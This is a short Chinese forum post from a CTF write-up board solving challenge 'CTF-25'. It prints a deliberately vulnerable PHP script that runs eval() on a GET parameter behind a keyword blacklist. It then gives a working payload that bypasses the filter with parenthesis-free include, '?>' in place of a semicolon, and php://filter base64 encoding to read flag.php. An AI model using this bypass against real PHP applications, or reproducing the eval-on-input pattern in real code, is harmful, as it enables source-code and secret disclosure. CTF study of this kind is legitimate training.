论坛首页 > CTF&WP专版

CTF-25解题思路

Track-子羽   ·   发表于 2021-11-17 15:12:03   ·   CTF&WP专版

源码分析:

  1. <?php error_reporting(0);
  2. if(isset($_GET['c']))
  3. { 
  4.     $c = $_GET['c'];
  5.     if(!preg_match("/flag|system|exec|shell|php|\.| |\'|\`|echo|\;|\(/i", $c))
  6.     { 
  7.         eval($c); 
  8.     }
  10. }
  11. else
  12. {
  13.      highlight_file(__FILE__); 
  14. }

考点:

绕过特殊字符和一些函数的过滤

payload:

  1. ?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

知识点:

include可以不用括号,分号可以用?>代替

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-17 | 789 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.